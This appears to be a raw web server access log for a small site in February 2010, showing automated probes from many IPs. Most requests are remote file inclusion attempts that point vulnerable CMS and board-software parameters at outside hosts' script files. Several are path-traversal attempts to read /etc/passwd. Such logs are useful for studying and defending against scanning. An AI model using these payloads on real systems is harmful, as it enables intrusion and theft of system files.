72.241.52.111 - - [06/Feb/2010:05:30:37 -0800] "GET /logs/access_100116.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:05:30:51 -0800] "GET /administrator/components/com_admin/toolbar.admin.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:05:30:51 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_admin/toolbar.admin.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.63.10.150 - - [06/Feb/2010:05:30:51 -0800] "GET /logs/administrator/components/com_admin/toolbar.admin.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.176.226.164 - - [06/Feb/2010:05:34:55 -0800] "GET /logs/access.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.cnkabu.com//id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.176.226.164 - - [06/Feb/2010:05:34:55 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.cnkabu.com//id.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.176.226.164 - - [06/Feb/2010:05:34:55 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.cnkabu.com//id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:35:18 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:35:18 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:35:18 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.146.189 - - [06/Feb/2010:05:35:42 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "getyourselfahorse.com"
110.45.146.189 - - [06/Feb/2010:05:35:42 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "getyourselfahorse.com"
212.227.29.27 - - [06/Feb/2010:05:35:47 -0800] "GET /logs/access_091121.log%20%20/?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.29.27 - - [06/Feb/2010:05:35:47 -0800] "GET /logs/?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.29.27 - - [06/Feb/2010:05:35:47 -0800] "GET /?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.29.27 - - [06/Feb/2010:05:36:26 -0800] "GET /logs/access_100116.log%20%20/?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.116.103.118 - - [06/Feb/2010:05:36:31 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.116.103.118 - - [06/Feb/2010:05:36:31 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.116.103.118 - - [06/Feb/2010:05:36:32 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:37:48 -0800] "GET /logs/access_091121.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:38:34 -0800] "GET /admin/classes/errors.php?error=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:38:34 -0800] "GET /logs/access_100123.log%20%20//admin/classes/errors.php?error=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:38:35 -0800] "GET /logs//admin/classes/errors.php?error=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:38:46 -0800] "GET /logs//admin/classes/errors.php?error=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:38:46 -0800] "GET /admin/classes/errors.php?error=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:38:46 -0800] "GET /logs/access.log%20%20//admin/classes/errors.php?error=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:38:59 -0800] "GET /admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:38:59 -0800] "GET /logs//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:38:59 -0800] "GET /logs/access_100123.log%20%20//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.116.103.118 - - [06/Feb/2010:05:39:05 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.116.103.118 - - [06/Feb/2010:05:39:05 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.116.103.118 - - [06/Feb/2010:05:39:06 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:39:12 -0800] "GET /logs//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:39:12 -0800] "GET /logs/access.log%20%20//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:39:12 -0800] "GET /admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:39:55 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:39:55 -0800] "GET /logs/access_100116.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:39:56 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.116.103.118 - - [06/Feb/2010:05:40:13 -0800] "GET /logs/access_091121.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:40:40 -0800] "GET /logs/access_100123.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:42:14 -0800] "GET /logs/access_100123.log//admin/classes/errors.php?error=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:42:45 -0800] "GET /logs/access_100123.log//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.29.27 - - [06/Feb/2010:05:42:49 -0800] "GET /logs/access_091121.log/?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:42:54 -0800] "GET /logs/access_091121.log//admin/classes/errors.php?error=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:43:03 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:43:03 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:43:03 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:43:28 -0800] "GET /logs/access_091121.log//admin/classes/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.116.103.118 - - [06/Feb/2010:05:43:39 -0800] "GET /logs/access_091121.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.29.27 - - [06/Feb/2010:05:43:43 -0800] "GET /logs/access_100116.log/?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:45:47 -0800] "GET /logs/access_091121.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:05:47:54 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:05:47:54 -0800] "GET /logs//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:05:47:59 -0800] "GET /logs/access.log//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:05:48:57 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:05:48:57 -0800] "GET /logs//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:05:48:57 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:05:49:38 -0800] "GET /logs/access_091121.log//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.145.178 - - [06/Feb/2010:05:49:57 -0800] "GET /admin/classes/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.145.178 - - [06/Feb/2010:05:49:57 -0800] "GET /logs/access_100123.log//admin/classes/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.145.178 - - [06/Feb/2010:05:49:57 -0800] "GET /logs//admin/classes/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.145.178 - - [06/Feb/2010:05:50:47 -0800] "GET /logs/access_091121.log//admin/classes/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:50:53 -0800] "GET /logs/access_091121.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:50:53 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:50:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:05:52:04 -0800] "GET /delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:05:52:04 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:05:52:04 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.146.189 - - [06/Feb/2010:05:52:48 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "getyourselfahorse.com"
110.45.146.189 - - [06/Feb/2010:05:52:48 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "getyourselfahorse.com"
220.73.144.196 - - [06/Feb/2010:05:55:04 -0800] "GET /logs/access.log/?NWCONF_SYSTEM[server_path]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [06/Feb/2010:05:55:04 -0800] "GET /logs/?NWCONF_SYSTEM[server_path]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [06/Feb/2010:05:55:04 -0800] "GET /?NWCONF_SYSTEM[server_path]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [06/Feb/2010:05:55:05 -0800] "GET /logs/access.log/?NWCONF_SYSTEM[server_path]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [06/Feb/2010:05:55:05 -0800] "GET /logs/?NWCONF_SYSTEM[server_path]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [06/Feb/2010:05:55:05 -0800] "GET /?NWCONF_SYSTEM[server_path]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [06/Feb/2010:05:56:06 -0800] "GET /logs/access.log%20%20/?NWCONF_SYSTEM[server_path]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [06/Feb/2010:05:56:06 -0800] "GET /?NWCONF_SYSTEM[server_path]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [06/Feb/2010:05:56:06 -0800] "GET /logs/?NWCONF_SYSTEM[server_path]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:05:58:08 -0800] "GET /logs/access_100130.log%20%20//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [06/Feb/2010:05:58:45 -0800] "GET /logs/access.log%20%20/?NWCONF_SYSTEM[server_path]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [06/Feb/2010:05:58:45 -0800] "GET /logs/?NWCONF_SYSTEM[server_path]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [06/Feb/2010:05:58:45 -0800] "GET /?NWCONF_SYSTEM[server_path]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.116.103.118 - - [06/Feb/2010:06:00:03 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.116.103.118 - - [06/Feb/2010:06:00:03 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.116.103.118 - - [06/Feb/2010:06:00:04 -0800] "GET /logs/access_091024.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.116.103.118 - - [06/Feb/2010:06:00:18 -0800] "GET /logs/access_091121.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://nastudy.net/data/item/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:06:03:41 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:06:03:41 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "getyourselfahorse.com"
147.202.16.15 - - [06/Feb/2010:06:03:51 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
24.23.78.174 - - [06/Feb/2010:06:04:26 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:06:05:21 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:06:05:21 -0800] "GET /logs/access_091024.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:06:05:21 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:06:05:36 -0800] "GET /logs/access_091121.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:06:05:44 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:06:05:44 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:06:05:44 -0800] "GET /logs/access_091024.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:06:05:45 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:06:05:45 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:06:05:56 -0800] "GET /logs/access_091121.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:06:14:50 -0800] "GET /logs/access_100123.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:06:14:50 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:06:14:50 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:06:15:22 -0800] "GET /logs/access_100116.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
147.202.16.15 - - [06/Feb/2010:06:16:37 -0800] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
147.202.16.15 - - [06/Feb/2010:06:16:38 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
147.202.16.15 - - [06/Feb/2010:06:16:38 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:18:59 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:18:59 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:19:06 -0800] "GET /logs/access_100130.log//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.146.189 - - [06/Feb/2010:06:19:52 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "getyourselfahorse.com"
110.45.146.189 - - [06/Feb/2010:06:19:52 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:20:45 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:20:45 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
